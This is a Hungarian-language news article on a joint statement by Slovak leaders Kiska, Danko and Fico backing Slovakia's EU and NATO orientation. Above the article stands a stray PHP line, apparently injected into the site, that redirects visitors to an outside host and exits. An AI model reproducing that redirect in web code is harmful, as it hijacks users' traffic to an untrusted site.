header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Kiska, Danko és Fico Szlovákia jövőjét az európai és atlanti irányultság megőrzésében látják
hétfő, május 27, 2019

Keresés

Kiska, Danko és Fico Szlovákia jövőjét az európai és atlanti irányultság megőrzésében látják

2493

- Közös állásfoglalás az ország stratégiai külpolitikai céljairól
- Kiska: Erősödnek az integrációellenes hangok
- Danko: Folyamatosan polarizálódunk
- Fico: A legmagasabb közjogi méltóságok most egy nyelvet beszélnek

Andrej Kiska, szlovák államfő kijelentette, hogy jelenleg már nem lehet a széleskörű belpolitikai egyezségre támaszkodni Szlovákia irányultságát illetően.

Szlovákia csak erős és összetartó unióban lehet befolyásos és magabiztos állam, miközben az egyes tagállamok nem képesek minden fontos gondot önállóan megoldani, áll a legfőbb közjogi méltóságok közös állásfoglalásában, amely a Szlovákia Európai Uniós és NATO tagságának prioritásairól értekezik.

Közös állásfoglalás az ország stratégiai külpolitikai céljairól

A közös nyilatkozatot a hétfői pozsonyi találkozóján fogadta el Andrej Kiska államfő, Andrej Danko házelnök és Robert Fico kormányfő, miután az ország stratégiai külpolitikai céljairól tárgyaltak a pozsonyi várban. A dokumentum megállapításait közösen tartott sajtótájékoztatójukon ismertették a találkozó résztvevői.

„Nagyon fontosnak tartom, hogy mind a hárman meg tudtunk egyezni és közös állásfoglalás született olyan témákat illetően, mint az EU, az ország biztonsága, vagy a NATO tagságunk. Fontos ez az országunk szempontjából, mert a polgáraink mindennapi életét érinti, befolyásolja az emberek biztonságát és országunk jövőjét. Rendkívül fontosnak tartom azt, hogy mi, hárman minden alkalommal visszaigazoljuk az országunk irányultságát, az értékeinket és a szövetségi kötelékeinket"– szögezte le Kiska.

Kiska: Erősödnek az integrációellenes hangok

Hozzátette, hogy ez szerinte azért is fontos, mivel: „erősödnek az integrációellenes hangok, amelyek politikai kampányok részévé válnak itthon és a környező országokban is." Emlékeztetett, hogy már nem lehet támaszkodni egy széleskörű politikai konszenzusra az ország irányultságát illetően. „Ellenkezőleg, erősödnek az integrációellenes hangok, ezért nem támaszkodhatunk a közvélemény automatikus támogatására. Az emberekhez őszintének kell lennünk, megerősítve bennük a szövetséges viszonyaink fontosságát" – érvelt az államfő. „Az emberek biztonságban szeretnék tudni magukat, ezért üdvözlendő dolog, hogy a kormány új biztonsági és védelmi stratégiát fogadott el, amit reményeim szerint a parlament is támogat majd" – mondta az államfő.

Kiska azt javasolta Ficonak és Dankonak, hogy találkozzanak minden EU-s és NATO csúcstalálkozó előtt. „Meg kell mutatni az embereknek, hogy az országunk stratégiai kérdéseit illetően összetartunk" – vélekedett az államfő, hozzátéve, hogy a szakminisztereknek is meg kellene nyilvánulni a közös európai ügyek, az egységes uniós piac építésének és a bankuniónak a kérdéseiben.

Danko: Folyamatosan polarizálódunk

Danko szerint Szlovákia nagyon jól teljesített az uniós elnöksége idején, azonban elszomorítja az tény, hogy ezt idehaza nem értékelik megfelelően. „Folyamatosan polarizálódunk, s ez a populista erők malmára hajtja a vizet, melyek a sértegetéseken és a kritikán kívül semmit nem tudnak felmutatni" – közölte. „Már az is nagy eredmény, hogy a három közjogi méltóság az egységet tudta deklarálni a külpolitikát illetően" – egészítette ki.
A házelnök szerint fontos, hogy mindenki lelkiismeret-vizsgálatot tartson. „Felszólítom a hírközlő eszközöket, hogy segítsenek abban, hogy javuljon a külföldön Szlovákiáról kialakított kép" – mondta.

Fico: A legmagasabb közjogi méltóságok most egy nyelvet beszélnek

Robert Fico úgy vélekedett, hogy „nehezen lehetett volna jobban időzíteni a találkozót, mint most, két nappal a cseh választások után. Kiemelte, úgy tűnik, Szlovákia kezd „proeurópai szigetté" válni a közép-európai térségben.

„Szlovákia olyan ország, amely a külpolitikai kérdésekben világos irányvonalat képvisel. A legmagasabb közjogi méltóságok pedig egy nyelvet beszélnek. Kiskának meg szerettük volna mutatni az összetartó erőnket, ezért a megbeszélésen jelen volt Bugár Béla, a Most-Híd elnöke is. Tudjuk, hogy mit szeretnénk elérni, ennek érdekében konkrét lépéseket teszünk" – szögezte le a kormányfő.

Fico sikeresnek értékelte a szlovák külpolitikát, példaként említette, hogy sikerült a szuverenitást demonstrálni a migráció megítélésében, az EU költségvetését illetően és a kettős élelmiszerminőség kérdésében is. Mindezek nagyon komplikált folyamatok voltak, azonban még sok kihívás vár az Európai Unióra, amely szerinte útkereszteződéshez ért.

Hozzátette: „Szlovákia érdekében előnyben részesítjük az unió összes tagországának közös előrelépését. Ezt közösen akarjuk elérni a szomszédos országokkal, mindenekelőtt a visegrádi négyekkel, valamint más stratégiai partnereinkkel is. Ugyanakkor készen állunk arra, hogy amennyiben a tagállamok egy csoportja gyorsabban fog előrehaladni az integráció bizonyos területein, mi is részesei legyünk ennek a folyamatnak, benne legyünk ebben a magban" – fogalmazott a miniszterelnök.

TASR/SITA/Gazdaság.sk
Fotó: SITA/Diana Černáková

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia